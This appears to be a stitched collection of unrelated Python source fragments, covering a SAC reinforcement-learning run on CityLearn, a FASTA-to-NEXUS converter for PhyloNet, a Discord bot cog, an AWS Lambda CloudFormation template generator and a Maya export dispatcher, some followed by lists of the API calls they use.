target_update_interval=25, policy_kwargs=policy_kwargs, learning_starts=interval-1, tensorboard_log=parent_dir+"tensorboard/")
print()
model.learn(total_timesteps=interval*icount, log_interval=log_interval, tb_log_name="", callback=callbackList)
# Summary Writer setup
# Writer will output to ./runs/ directory by default
writer = writer.SummaryWriter(log_dir=parent_dir+"tensorboard/_1")
print("Saving TB to {}".format(parent_dir+"tensorboard/_1"))
iteration_step = 0
obs = env.reset()
dones = False
counter = []
# One episode
while dones==False:
action, _states = model.predict(obs)
obs, rewards, dones, info = env.step(action)
counter.append(rewards)
# Logging
if iteration_step % interval:
# Building reward
writer.add_scalar("Reward/Buildings", rewards, iteration_step)
iteration_step += 1
# Costs
writer.add_scalars("Scores", env.cost(), iteration_step)
# writer.add_scalar("Scores/ramping", env.cost()['ramping'], iteration_step)
# writer.add_scalar("Scores/1-load_factor", env.cost()['1-load_factor'], iteration_step)
# writer.add_scalar("Scores/average_daily_peak", env.cost()['average_daily_peak'], iteration_step)
# writer.add_scalar("Scores/peak_demand", env.cost()['peak_demand'], iteration_step)
# writer.add_scalar("Scores/net_electricity_consumption", env.cost()['net_electricity_consumption'], iteration_step)
# writer.add_scalar("Scores/total", env.cost()['total'], iteration_step)
env.close()
print("\nFinal rewards:")
pp.pprint(env.cost())
# Plot the reward graph
# plot_results([log_dir], interval*icount, results_plotter.X_TIMESTEPS, "SAC CityLearn")
# plt.savefig(log_dir+"/rewards.pdf") | [
"stable_baselines3.SAC",
"os.makedirs",
"pkg3_utils.TensorboardCallback",
"torch.utils.tensorboard.writer.SummaryWriter",
"time.strftime",
"citylearn.CityLearn",
"stable_baselines3.common.monitor.Monitor",
"warnings.simplefilter",
"torch.utils.tensorboard.writer.add_scalar",
"pkg3_utils.SaveOnBestTrainingRewardCallback"
] | [((1104, 1148), 'warnings.simplefilter', 'warnings.simplefilter', (['"""ignore"""', 'UserWarning'], {}), "('ignore', UserWarning)\n", (1125, 1148), False, 'import warnings\n'), ((1823, 2029), 'citylearn.CityLearn', 'CityLearn', (['data_path', 'building_attributes', 'weather_file', 'solar_profile', 'building_ids'], {'buildings_states_actions': 'building_state_actions', 'cost_function': 'objective_function', 'central_agent': '(True)', 'verbose': '(1)'}), '(data_path, building_attributes, weather_file, solar_profile,\n building_ids, buildings_states_actions=building_state_actions,\n cost_function=objective_function, central_agent=True, verbose=1)\n', (1832, 2029), False, 'from citylearn import CityLearn\n'), ((2187, 2225), 'os.makedirs', 'os.makedirs', (['parent_dir'], {'exist_ok': '(True)'}), '(parent_dir, exist_ok=True)\n', (2198, 2225), False, 'import time, sys, os\n'), ((2275, 2310), 'os.makedirs', 'os.makedirs', (['log_dir'], {'exist_ok': '(True)'}), '(log_dir, exist_ok=True)\n', (2286, 2310), False, 'import time, sys, os\n'), ((2557, 2587), 'stable_baselines3.common.monitor.Monitor', 'Monitor', (['env'], {'filename': 'log_dir'}), '(env, filename=log_dir)\n', (2564, 2587), False, 'from stable_baselines3.common.monitor import Monitor\n'), ((2603, 2694), 'pkg3_utils.SaveOnBestTrainingRewardCallback', 'SaveOnBestTrainingRewardCallback', ([], {'check_freq': '(check_interval * interval)', 'log_dir': 'log_dir'}), '(check_freq=check_interval * interval,\n log_dir=log_dir)\n', (2635, 2694), False, 'from pkg3_utils import available_cpu_count as cpu_cores, SaveOnBestTrainingRewardCallback, TensorboardCallback\n'), ((2702, 2723), 'pkg3_utils.TensorboardCallback', 'TensorboardCallback', ([], {}), '()\n', (2721, 2723), False, 'from pkg3_utils import available_cpu_count as cpu_cores, SaveOnBestTrainingRewardCallback, TensorboardCallback\n'), ((2983, 3238), 'stable_baselines3.SAC', 'SAC', (['MlpPolicy_SAC', 'env'], {'verbose': '(1)', 'learning_rate': '(0.005)', 'gamma': '(0.99)', 'tau': '(0.0003)', 'batch_size': '(2048)', 'train_freq': '(25)', 'target_update_interval': '(25)', 'policy_kwargs': 'policy_kwargs', 'learning_starts': '(interval - 1)', 'tensorboard_log': "(parent_dir + 'tensorboard/')"}), "(MlpPolicy_SAC, env, verbose=1, learning_rate=0.005, gamma=0.99, tau=\n 0.0003, batch_size=2048, train_freq=25, target_update_interval=25,\n policy_kwargs=policy_kwargs, learning_starts=interval - 1,\n tensorboard_log=parent_dir + 'tensorboard/')\n", (2986, 3238), False, 'from stable_baselines3 import SAC\n'), ((3429, 3488), 'torch.utils.tensorboard.writer.SummaryWriter', 'writer.SummaryWriter', ([], {'log_dir': "(parent_dir + 'tensorboard/_1')"}), "(log_dir=parent_dir + 'tensorboard/_1')\n", (3449, 3488), False, 'from torch.utils.tensorboard import writer\n'), ((2131, 2161), 'time.strftime', 'time.strftime', (['"""%Y%m%d-%H%M%S"""'], {}), "('%Y%m%d-%H%M%S')\n", (2144, 2161), False, 'import time, sys, os\n'), ((3844, 3906), 'torch.utils.tensorboard.writer.add_scalar', 'writer.add_scalar', (['"""Reward/Buildings"""', 'rewards', 'iteration_step'], {}), "('Reward/Buildings', rewards, iteration_step)\n", (3861, 3906), False, 'from torch.utils.tensorboard import writer\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 16 13:13:51 2020
This script converts a fasta file to a nexus file to be used in
PhyloNet (MLE_BiMarkers).
It produces 0/1-encoded sequences in nexus format by filtering for
biallelic markers and selecting one individual per taxon to be
listed afterwards.
"""
__author__ = '<NAME>'
__mail__ = '<EMAIL>'
import os
import argparse
from Bio import AlignIO
from Bio.Align import MultipleSeqAlignment
import pandas as pd
import random
from itertools import chain
# produces the final nexus file
def nexico(data_frepname,
prenex,
postnex,
rep_alignment,
individual,
name_len):
with open(data_frepname, 'a') as data_f:
data_f.write(prenex)
for count, seq in enumerate(rep_alignment):
eindi = individual[count]
rep_seq = [x for i, x in enumerate(seq.seq) if i not in triallelic]
bin_seq = ''.join(['1' if rp == st else '0' for rp, st in zip(rep_seq, rep_standard)])
# eispi = ''.join(eidi[0].split('.')).lower()
# rewrite the fastafile for PhyloNet as nexus
with open(data_frepname, 'a') as data_f:
data_f.write(f'{eindi}{" "*int(name_len + 1 - len(eindi))}')
data_f.write(f'{bin_seq}\n')
## reference all ind to specific populations/taxa
# with open(map_frepname, 'a') as map_f:
# if count+1 != len(alignment):
# map_f.write(f'{eindi}\t{eispi}\n')
# else:
# map_f.write(f'{eindi}\t{eispi}')
with open(data_frepname, 'a') as data_f:
data_f.write(postnex)
# number of reticulations
RET = 0
# number of runs
MAX_NUM_RUN = 20
parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("-i", action="store", dest="rep_dir", required=True,
help="Name of the input fasta file")
parser.add_argument('-n', action='store', dest='topo',
help='nexus file with topology if given')
args = parser.parse_args()
BIG_DIR = args.rep_dir
TOPO = args.topo
# BIG_DIR = '/Users/Thomsn/Desktop/Studium/MEME Programme [current]/Universite de Montpellier [Sem2]/internship_scornavacca_lab/git_lab/phylogenetto/data/real_data/vitis/phylonet/2020_04_vitis_USA_summary_20_reps'
os.chdir(BIG_DIR)
# TOPO = True
rep_list = [diro for diro in os.listdir() if 'rep_' in diro]
for repsdir in rep_list:
# repsdir = f'{rep}'
file_name1 = f'{repsdir}/rep_new_asgnmt.fasta' # change to std
file_name2 = f'{repsdir}/rep_new_asgnmt.fasta'
for file_name in [file_name1, file_name2]:
alignment = AlignIO.read(file_name, 'fasta')
spac = []
ind = []
map_str = ''
for count, seq in enumerate(alignment):
eidi = seq.id.split('\\n')[0].split('|')
eindi = ''.join(eidi[1].split('_'))[-10:].lower()
eispi = ''.join(''.join(eidi[0].split('.')).split('2')).lower()
spac.append(eispi)
ind.append(eindi)
#for ret in range(max_ret + 1):
# if not os.path.exists(repsdir):
# os.makedirs(repsdir)
print(f'~~~ fasta-file {file_name} was set for max {RET} reticulation in: {repsdir} ~~~\n ')
loci_frepname = f'{repsdir}/rep_{file_name.split("_")[-2]}_biallelic_loci.txt'
# nexus_file for phylonet-input
data_frepname = f'{repsdir}/rep_{file_name.split("_")[-2]}_data_{RET}_ret.nexus'
## map file referecing taxon and ind.
# map_frepname = f'{repdir}/pnw_imap.txt'
# which loci are mono- or triallelic?
triallelic = []
for base_count in range(len(alignment[0].seq)):
occ_bases = set(list(alignment[:,base_count]))
if len([x for x in occ_bases if x.upper() not in ['A','T','G','C']]) > 0:
print('You have bases which are not ATGC. This script does not account for N or -.\
please change the script and rerun!')
else:
if len(occ_bases) != 2:
triallelic.append(base_count)
print(f' -> there were {len(triallelic)} mono- or triallelic loci reported. those will be \
removed from the alignment for this replicate. A list of the used loci is stored in: {loci_frepname}')
loci_kept = [i for i, _ in enumerate(alignment[0].seq) if i not in triallelic]
with open(loci_frepname, 'a') as loci_f:
loci_f.write(','.join([str(l) for l in loci_kept]))
# first sequence in alignment is by definition standard and will have only 1 in sequence (reference allele)
rep_standard = [x for i, x in enumerate(alignment[0].seq) if i not in triallelic]
# obtain length of longest ind name
name_len = max([len(y) for y in ind])
taxa = list(set(spac))
taxind_postnex = [','.join([ind[i] for i, sp in enumerate(spac) if sp == spe]) for spe in taxa]
        # defining nexus preamble and phylonet block
prenex = f'''#NEXUS\nBegin data;\n\
Dimensions ntax={alignment.__len__()} nchar={len(loci_kept)};\n\
Format datatype=dna symbols="012" missing=? gap=-;\n\
Matrix\n\n'''
ret = 0
postnex = f''';End;\n\n\
BEGIN PHYLONET;\n\
MLE_BiMarkers -taxa ({",".join(ind)}) -pseudo -mnr 10 -mr {RET} -tm \
<{"; ".join([f"{t}:{i}" for t, i in zip(taxa, taxind_postnex)])}>;\n\
END;'''
        # extending postnex, if TOPO is given
if TOPO:
topo_file = f'{repsdir}/rep_{file_name.split("_")[-2]}_topo.nex'
with open(topo_file,'r') as tfile:
soup = tfile.readlines()
for molecules in soup:
if '[&U]' in molecules:
atom = molecules.split('[&U] ')[-1]
postnex = f''';End;\n\n\
BEGIN NETWORKS;\n\
Network net1 = {atom}\
END;\n\n\
BEGIN PHYLONET;\n\
MLE_BiMarkers -taxa ({",".join(ind)}) -pseudo -esptheta -mnr {MAX_NUM_RUN} -mr {RET} -snet (net1) -tm \
<{"; ".join([f"{t}:{i}" for t, i in zip(taxa, taxind_postnex)])}>;\n\
END;'''
else:
postnex = f''';End;\n\n\
BEGIN PHYLONET;\n\
MLE_BiMarkers -taxa ({",".join(ind)}) -pseudo -mr {RET} -tm \
<{"; ".join([f"{t}:{i}" for t, i in zip(taxa, taxind_postnex)])}>;\n\
END;'''
# writing the nexus file
nexico(data_frepname, prenex, postnex, alignment, ind, name_len)
print(f'~~~ Done! ~~~\n ')
| [
"os.chdir",
"os.listdir",
"Bio.AlignIO.read",
"argparse.ArgumentParser"
] | [((1729, 1832), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '__doc__', 'formatter_class': 'argparse.RawDescriptionHelpFormatter'}), '(description=__doc__, formatter_class=argparse.\n RawDescriptionHelpFormatter)\n', (1752, 1832), False, 'import argparse\n'), ((2358, 2375), 'os.chdir', 'os.chdir', (['BIG_DIR'], {}), '(BIG_DIR)\n', (2366, 2375), False, 'import os\n'), ((2422, 2434), 'os.listdir', 'os.listdir', ([], {}), '()\n', (2432, 2434), False, 'import os\n'), ((2688, 2720), 'Bio.AlignIO.read', 'AlignIO.read', (['file_name', '"""fasta"""'], {}), "(file_name, 'fasta')\n", (2700, 2720), False, 'from Bio import AlignIO\n')] |
import asyncio
import discord
from discord.ext.commands import Bot
from discord.ext import commands
from discord import Color, Embed
class Test(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command()
async def test(self, ctx):
guild = ctx.message.guild
content = ctx.message.content.split()[1:]
word = content[0]
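        # Assumes the first argument is a member mention of the form "<@!ID>";
        # word[3:-1] strips the "<@!" prefix and ">" suffix to leave the numeric ID.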
print(guild.get_member(int(word[3:-1])).nick)
def setup(bot):
bot.add_cog(Test(bot))
| [
"discord.ext.commands.command"
] | [((221, 239), 'discord.ext.commands.command', 'commands.command', ([], {}), '()\n', (237, 239), False, 'from discord.ext import commands\n')] |
from mako.template import Template
from mako.runtime import Context
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
from lambdatool.parts import get_the_api_chunk
from lambdatool.cf_import_things import role_parameter_section
from lambdatool.cf_import_things import parameter_role_spec
from lambdatool.cf_import_things import imported_role_spec
from lambdatool.cf_import_things import sg_parameter_section
from lambdatool.cf_import_things import sg_parameter_spec
from lambdatool.cf_import_things import imported_sg_spec
from lambdatool.cf_import_things import subnets_parameter_section
from lambdatool.cf_import_things import subnets_parameter_spec
from lambdatool.cf_import_things import imported_subnets_spec
from lambdatool.cf_import_things import api_output_section
from lambdatool.cf_import_things import output_section
from lambdatool.cf_import_things import lambda_log_group
from lambdatool.cf_import_things import resource_policy_spacer
from lambdatool.cf_import_things import resource_policy
import traceback
import os
import sys
import logging
whitelist = 'whitelist'
export_name = 'export_name'
snsTopicARN = 'snstopicarn'
trustedService = 'trustedservice'
trustedAccount = 'trustedaccount'
reservedConcurrency = 'reservedconcurrency'
schedule = 'scheduleexpression'
service = 'service'
new_line = '\n'
spacer = ' '
sns_topic_arn = """ snsTopicARN:
Description: the ARN of the topic to which we are subscribing
Type: String"""
trusted_service = """ trustedService:
Description: service which this lambda trusts
Type: String"""
trusted_account = """ trustedAccount:
Description: account which this lambda trusts
Type: String"""
reserved_concurrency = """ reservedConcurrency:
Description: the maximum number of concurrent invocations
Type: String"""
schedule_expression = """ scheduleExpression:
Description: rate or cron expression for a scheduled lambda
Type: String"""
sns_subcription_resource = """ TopicSubscription:
Type: AWS::SNS::Subscription
DependsOn: LambdaFunction
Properties:
Endpoint:
Fn::GetAtt: [LambdaFunction, Arn]
Protocol: lambda
TopicArn:
Ref: snsTopicARN
TopicPermission:
Type: AWS::Lambda::Permission
DependsOn: TopicSubscription
Properties:
FunctionName:
Fn::GetAtt: [LambdaFunction, Arn]
Action: lambda:InvokeFunction
Principal: sns.amazonaws.com"""
WITH_ACCOUNT = 'WITH_ACCOUNT'
WITHOUT_ACCOUNT = 'WITHOUT_ACCOUNT'
trusted_service_resource = dict()
trusted_service_resource[WITHOUT_ACCOUNT] = """ TrustedService:
Type: AWS::Lambda::Permission
DependsOn: LambdaFunction
Properties:
FunctionName:
Fn::GetAtt: [LambdaFunction, Arn]
Action: lambda:InvokeFunction
Principal:
Ref: trustedService"""
trusted_service_resource[WITH_ACCOUNT] = """ TrustedService:
Type: AWS::Lambda::Permission
DependsOn: LambdaFunction
Properties:
FunctionName:
Fn::GetAtt: [LambdaFunction, Arn]
Action: lambda:InvokeFunction
Principal:
Ref: trustedService
SourceAccount:
Ref: trustedAccount"""
reserved_concurrency_resource = ''' ReservedConcurrentExecutions:
Ref: reservedConcurrency'''
rule_id = '{}-{}'.format(
os.environ.get('LAMBDA_NAME', 'unknown'),
os.environ.get('ENVIRONMENT', 'none')
)
schedule_resource = """ LambdaSchedule:
Type: AWS::Events::Rule
DependsOn: LambdaFunction
Properties:
Description: String
ScheduleExpression:
Ref: scheduleExpression
State: ENABLED
Targets:
-
Arn:
Fn::GetAtt: [LambdaFunction, Arn]
Id:
{}
EventPermission:
Type: AWS::Lambda::Permission
DependsOn: LambdaFunction
Properties:
FunctionName:
Fn::GetAtt: [LambdaFunction, Arn]
Action: lambda:InvokeFunction
Principal: events.amazonaws.com""".format(rule_id)
class TemplateCreator:
_stack_properties = None
_input_file = None
_output_file = None
_template_file = None
_sns_topic_arn_found = False
_trusted_service_found = False
_trusted_account_found = False
_reserved_concurrency_found = False
_create_service = False
_schedule_found = False
_export_name = None
_region = None
_stage_name = None
_short_name = None
_account = None
_ssm_client = None
_import_role = False
_import_subnets = False
_import_security_group = False
_import_sqs_arn = False
_description = None
_create_log_group = False
SSM = '[ssm:'
IMPORT = '[import:'
_food = """ Environment:
Variables:
"""
def __init__(self, ssm_client):
self._ssm_client = ssm_client
def _prop_to_yaml(self, thing):
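        # Split a "key=value" property line into (key, value), resolving any [ssm:...] reference in the value.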
idx = thing.find('=')
if idx > -1:
key = thing[:idx]
val = thing[(idx+1):].strip()
val = self._get_ssm_parameter(val)
if val:
return key, val
return None, None
def _inject_stuff(self):
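        # Render the CloudFormation template: collect the function properties as environment
        # variables, build the optional sections, then fill the mako template and write the output file.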
try:
with open(self._input_file, 'r') as infile:
for thing in infile:
key, val = self._prop_to_yaml(thing.strip())
if key and val:
self._food += spacer + key + ': ' + val + '\n'
buf = StringIO()
t = Template(filename=self._template_file)
if self._sns_topic_arn_found:
sns_var_bits = sns_topic_arn
sns_resource_bits = sns_subcription_resource
else:
sns_var_bits = ''
sns_resource_bits = ''
if self._trusted_service_found:
if self._trusted_account_found:
trusted_service_var_bits = trusted_service + new_line + trusted_account
trusted_service_resource_bits = trusted_service_resource[WITH_ACCOUNT]
else:
trusted_service_var_bits = trusted_service
trusted_service_resource_bits = trusted_service_resource[WITHOUT_ACCOUNT]
else:
trusted_service_var_bits = ''
trusted_service_resource_bits = ''
if self._reserved_concurrency_found:
reserved_concurrency_var_bits = reserved_concurrency
reserved_concurrency_resource_bits = reserved_concurrency_resource
else:
reserved_concurrency_var_bits = ''
reserved_concurrency_resource_bits = ''
if self._schedule_found:
schedule_var_bits = schedule_expression
schedule_resource_bits = schedule_resource
else:
schedule_var_bits = ''
schedule_resource_bits = ''
if self._create_service:
the_api_bits = get_the_api_chunk(
region=self._region,
stage_name=self._stage_name,
short_name=self._short_name,
account=self._account,
resource_policy=self._resource_policy
)
else:
the_api_bits = ''
if self._import_role:
current_role_parameter_section = ''
role = self._find_imported_csv(
self._stack_properties.get('role', None)
)
role_specification = imported_role_spec.format(role)
else:
current_role_parameter_section = role_parameter_section
role_specification = parameter_role_spec
subnet_specification = None
includeVpcConfig = True
if self._stack_properties.get('subnetIds', None) is None:
current_subnets_parameter_section = None
subnet_specification = None
includeVpcConfig = False
elif self._import_subnets:
current_subnets_parameter_section = ''
subnets = self._find_imported_csv(
self._stack_properties.get('subnetIds', None)
)
for subnet in subnets.split(','):
if subnet_specification:
subnet_specification = subnet_specification + \
'\n' + spacer + \
imported_subnets_spec.format(subnet)
else:
subnet_specification = imported_subnets_spec.format(subnet)
else:
current_subnets_parameter_section = subnets_parameter_section
subnet_specification = subnets_parameter_spec
sg_specification = None
if self._stack_properties.get('securityGroupIds', None) is None:
current_sg_parameter_section = None
sg_specification = None
includeVpcConfig = False
elif self._import_security_group:
current_sg_parameter_section = ''
sg_csv = self._find_imported_csv(
self._stack_properties.get('securityGroupIds', None)
)
for sg in sg_csv.split(','):
if sg_specification:
sg_specification = sg_specification + \
'\n' + spacer + \
imported_sg_spec.format(sg)
else:
sg_specification = imported_sg_spec.format(sg)
else:
current_sg_parameter_section = sg_parameter_section
sg_specification = sg_parameter_spec
logging.info('includeVpcConfig: %s', includeVpcConfig)
if self._export_name:
if self._create_service:
output_section_bits = api_output_section.format(
self._export_name,
self._export_name,
self._export_name
)
else:
output_section_bits = output_section.format(self._export_name, self._export_name)
else:
output_section_bits = ''
if self._create_log_group:
lambda_log_group_bits = lambda_log_group
else:
lambda_log_group_bits = ''
ctx = Context(
buf,
environment_section=self._food,
stackDescription=self._description,
outputSection=output_section_bits,
snsTopicARN=sns_var_bits,
snsSubscriptionResource=sns_resource_bits,
trustedService=trusted_service_var_bits,
trustedServiceResource=trusted_service_resource_bits,
reservedConcurrency=reserved_concurrency_var_bits,
reservedConcurrencyResource=reserved_concurrency_resource_bits,
scheduleExpression=schedule_var_bits,
scheduleResource=schedule_resource_bits,
theAPI=the_api_bits,
roleParameterSection=current_role_parameter_section,
roleSpecification=role_specification,
subnetsParameterSection=current_subnets_parameter_section,
subnetIds=subnet_specification,
sgParameterSection=current_sg_parameter_section,
lambdaLogGroup=lambda_log_group_bits,
securityGroupIds=sg_specification,
includeVpcConfig=includeVpcConfig
)
t.render_context(ctx)
logging.info('writing template {}'.format(self._output_file))
with open(self._output_file, "w") as outfile:
outfile.write(buf.getvalue())
except Exception as wtf:
logging.error('Exception caught in inject_stuff(): {}'.format(wtf))
traceback.print_exc(file=sys.stdout)
sys.exit(1)
def _read_stack_properties(self):
try:
lowered_stack_properties = {}
for key in self._stack_properties:
lowered_key = key.lower()
lowered_stack_properties[lowered_key] = self._stack_properties[key]
role = lowered_stack_properties.get('role', None)
subnets = lowered_stack_properties.get('subnetids', None)
security_group = lowered_stack_properties.get('securitygroupids', None)
sqs_arn = lowered_stack_properties.get('sqsarn', None)
if role and role.startswith(self.IMPORT):
self._import_role = True
if subnets and subnets.startswith(self.IMPORT):
self._import_subnets = True
if security_group and security_group.startswith(self.IMPORT):
self._import_security_group = True
if sqs_arn and sqs_arn.startswith(self.IMPORT):
self._import_sqs_arn = True
if snsTopicARN in lowered_stack_properties:
self._sns_topic_arn_found = True
if trustedService in lowered_stack_properties:
self._trusted_service_found = True
if trustedAccount in lowered_stack_properties:
self._trusted_account_found = True
if reservedConcurrency in lowered_stack_properties:
self._reserved_concurrency_found = True
if schedule in lowered_stack_properties:
self._schedule_found = True
if export_name in lowered_stack_properties:
self._export_name = lowered_stack_properties.get(export_name)
if lowered_stack_properties.get('whitelist', None):
parts = lowered_stack_properties.get(whitelist).split(',')
buf = resource_policy
for cidr in parts:
buf = buf + '\n' + resource_policy_spacer + cidr
self._resource_policy = buf
else:
self._resource_policy = ''
tmp = lowered_stack_properties.get(service, 'false').lower()
if tmp == 'true':
self._create_service = True
except Exception as wtf:
logging.error('Exception caught in read_stack_properties(): {}'.format(wtf))
sys.exit(1)
return True
def create_template(self, **kwargs):
try:
self._input_file = kwargs['function_properties']
self._stack_properties = kwargs['stack_properties']
self._output_file = kwargs['output_file']
self._template_file = kwargs['template_file']
self._region = kwargs['region']
self._stage_name = kwargs['stage_name']
self._short_name = kwargs['short_name']
self._account = kwargs['account']
self._create_log_group = kwargs['create_log_group']
self._description = kwargs.get('description', 'Fantastic Lambda Function')
self._read_stack_properties()
self._inject_stuff()
return True
except Exception as wtf:
logging.error(wtf)
return False
def _get_ssm_parameter(self, p):
"""
Get parameters from Simple Systems Manager
Args:
p - a parameter name
Returns:
a value, decrypted if needed, if successful or None if things go
sideways.
"""
try:
if p.startswith(self.SSM) and p.endswith(']'):
parts = p.split(':')
p = parts[1].replace(']', '')
else:
return p
response = self._ssm_client.get_parameter(Name=p, WithDecryption=True)
return response.get('Parameter', {}).get('Value', None)
except Exception as ruh_roh:
logging.error(ruh_roh, exc_info=False)
return None
def _find_imported_csv(self, raw_str):
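        # Extract the value from an "[import: value]" expression, e.g. "[import: some-role]" -> "some-role".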
answer = None
try:
wrk = raw_str
wrk = wrk.replace('[', '')
wrk = wrk.replace(']', '')
wrk = wrk.replace(' ', '')
parts = wrk.split(':')
answer = parts[1]
except Exception:
answer = None
return answer
if __name__ == '__main__':
templateCreator = TemplateCreator()
templateCreator.create_template(
function_properties='/tmp/scratch/f315ee80/config/dev/function.properties',
stack_properties='/tmp/scratch/f315ee80/stack.properties',
output_file='/tmp/template.yaml',
template_file='template_template'
)
| [
"lambdatool.cf_import_things.imported_subnets_spec.format",
"mako.template.Template",
"os.environ.get",
"lambdatool.cf_import_things.api_output_section.format",
"lambdatool.cf_import_things.output_section.format",
"lambdatool.cf_import_things.imported_role_spec.format",
"sys.exit",
"lambdatool.parts.get_the_api_chunk",
"io.StringIO",
"traceback.print_exc",
"logging.info",
"logging.error",
"lambdatool.cf_import_things.imported_sg_spec.format",
"mako.runtime.Context"
] | [((3352, 3392), 'os.environ.get', 'os.environ.get', (['"""LAMBDA_NAME"""', '"""unknown"""'], {}), "('LAMBDA_NAME', 'unknown')\n", (3366, 3392), False, 'import os\n'), ((3398, 3435), 'os.environ.get', 'os.environ.get', (['"""ENVIRONMENT"""', '"""none"""'], {}), "('ENVIRONMENT', 'none')\n", (3412, 3435), False, 'import os\n'), ((5446, 5456), 'io.StringIO', 'StringIO', ([], {}), '()\n', (5454, 5456), False, 'from io import StringIO\n'), ((5473, 5511), 'mako.template.Template', 'Template', ([], {'filename': 'self._template_file'}), '(filename=self._template_file)\n', (5481, 5511), False, 'from mako.template import Template\n'), ((9780, 9834), 'logging.info', 'logging.info', (['"""includeVpcConfig: %s"""', 'includeVpcConfig'], {}), "('includeVpcConfig: %s', includeVpcConfig)\n", (9792, 9834), False, 'import logging\n'), ((10490, 11385), 'mako.runtime.Context', 'Context', (['buf'], {'environment_section': 'self._food', 'stackDescription': 'self._description', 'outputSection': 'output_section_bits', 'snsTopicARN': 'sns_var_bits', 'snsSubscriptionResource': 'sns_resource_bits', 'trustedService': 'trusted_service_var_bits', 'trustedServiceResource': 'trusted_service_resource_bits', 'reservedConcurrency': 'reserved_concurrency_var_bits', 'reservedConcurrencyResource': 'reserved_concurrency_resource_bits', 'scheduleExpression': 'schedule_var_bits', 'scheduleResource': 'schedule_resource_bits', 'theAPI': 'the_api_bits', 'roleParameterSection': 'current_role_parameter_section', 'roleSpecification': 'role_specification', 'subnetsParameterSection': 'current_subnets_parameter_section', 'subnetIds': 'subnet_specification', 'sgParameterSection': 'current_sg_parameter_section', 'lambdaLogGroup': 'lambda_log_group_bits', 'securityGroupIds': 'sg_specification', 'includeVpcConfig': 'includeVpcConfig'}), '(buf, environment_section=self._food, stackDescription=self.\n _description, outputSection=output_section_bits, snsTopicARN=\n sns_var_bits, snsSubscriptionResource=sns_resource_bits, trustedService\n =trusted_service_var_bits, trustedServiceResource=\n trusted_service_resource_bits, reservedConcurrency=\n reserved_concurrency_var_bits, reservedConcurrencyResource=\n reserved_concurrency_resource_bits, scheduleExpression=\n schedule_var_bits, scheduleResource=schedule_resource_bits, theAPI=\n the_api_bits, roleParameterSection=current_role_parameter_section,\n roleSpecification=role_specification, subnetsParameterSection=\n current_subnets_parameter_section, subnetIds=subnet_specification,\n sgParameterSection=current_sg_parameter_section, lambdaLogGroup=\n lambda_log_group_bits, securityGroupIds=sg_specification,\n includeVpcConfig=includeVpcConfig)\n', (10497, 11385), False, 'from mako.runtime import Context\n'), ((6972, 7139), 'lambdatool.parts.get_the_api_chunk', 'get_the_api_chunk', ([], {'region': 'self._region', 'stage_name': 'self._stage_name', 'short_name': 'self._short_name', 'account': 'self._account', 'resource_policy': 'self._resource_policy'}), '(region=self._region, stage_name=self._stage_name,\n short_name=self._short_name, account=self._account, resource_policy=\n self._resource_policy)\n', (6989, 7139), False, 'from lambdatool.parts import get_the_api_chunk\n'), ((7552, 7583), 'lambdatool.cf_import_things.imported_role_spec.format', 'imported_role_spec.format', (['role'], {}), '(role)\n', (7577, 7583), False, 'from lambdatool.cf_import_things import imported_role_spec\n'), ((12016, 12052), 'traceback.print_exc', 'traceback.print_exc', ([], {'file': 'sys.stdout'}), '(file=sys.stdout)\n', 
(12035, 12052), False, 'import traceback\n'), ((12065, 12076), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (12073, 12076), False, 'import sys\n'), ((14413, 14424), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (14421, 14424), False, 'import sys\n'), ((15228, 15246), 'logging.error', 'logging.error', (['wtf'], {}), '(wtf)\n', (15241, 15246), False, 'import logging\n'), ((15949, 15987), 'logging.error', 'logging.error', (['ruh_roh'], {'exc_info': '(False)'}), '(ruh_roh, exc_info=False)\n', (15962, 15987), False, 'import logging\n'), ((9953, 10040), 'lambdatool.cf_import_things.api_output_section.format', 'api_output_section.format', (['self._export_name', 'self._export_name', 'self._export_name'], {}), '(self._export_name, self._export_name, self.\n _export_name)\n', (9978, 10040), False, 'from lambdatool.cf_import_things import api_output_section\n'), ((10194, 10253), 'lambdatool.cf_import_things.output_section.format', 'output_section.format', (['self._export_name', 'self._export_name'], {}), '(self._export_name, self._export_name)\n', (10215, 10253), False, 'from lambdatool.cf_import_things import output_section\n'), ((8600, 8636), 'lambdatool.cf_import_things.imported_subnets_spec.format', 'imported_subnets_spec.format', (['subnet'], {}), '(subnet)\n', (8628, 8636), False, 'from lambdatool.cf_import_things import imported_subnets_spec\n'), ((9600, 9627), 'lambdatool.cf_import_things.imported_sg_spec.format', 'imported_sg_spec.format', (['sg'], {}), '(sg)\n', (9623, 9627), False, 'from lambdatool.cf_import_things import imported_sg_spec\n'), ((8490, 8526), 'lambdatool.cf_import_things.imported_subnets_spec.format', 'imported_subnets_spec.format', (['subnet'], {}), '(subnet)\n', (8518, 8526), False, 'from lambdatool.cf_import_things import imported_subnets_spec\n'), ((9503, 9530), 'lambdatool.cf_import_things.imported_sg_spec.format', 'imported_sg_spec.format', (['sg'], {}), '(sg)\n', (9526, 9530), False, 'from lambdatool.cf_import_things import imported_sg_spec\n')] |
# coding: utf-8
# Author: <NAME>
# Contact: <EMAIL>
# Python modules
import os
import logging
import json
logger = logging.getLogger(__name__)
# Wizard modules
from maya_wizard import wizard_plugin
from maya_wizard.export import modeling
from maya_wizard.export import rigging
from maya_wizard.export import custom
from maya_wizard.export import camrig
from maya_wizard.export import layout
from maya_wizard.export import animation
from maya_wizard.export import camera
# read_settings
if 'wizard_json_settings'.upper() in os.environ.keys():
settings_dic = json.loads(os.environ['wizard_json_settings'])
frange = settings_dic['frange']
refresh_assets = settings_dic['refresh_assets']
nspace_list = settings_dic['nspace_list']
stage_name = settings_dic['stage_to_export']
if refresh_assets:
wizard_plugin.update_all()
if stage_name == 'modeling':
modeling.main()
elif stage_name == 'rigging':
rigging.main()
elif stage_name == 'custom':
custom.main()
elif stage_name == 'camrig':
camrig.main()
elif stage_name == 'layout':
layout.main()
elif stage_name == 'animation':
animation.main(nspace_list=nspace_list,
frange=frange)
elif stage_name == 'camera':
camera.main(nspace_list=nspace_list,
frange=frange)
else:
logger.warning("Unplugged stage : {}".format(stage_name))
else:
logger.error("Batch settings not found")
| [
"logging.getLogger",
"os.environ.keys",
"json.loads",
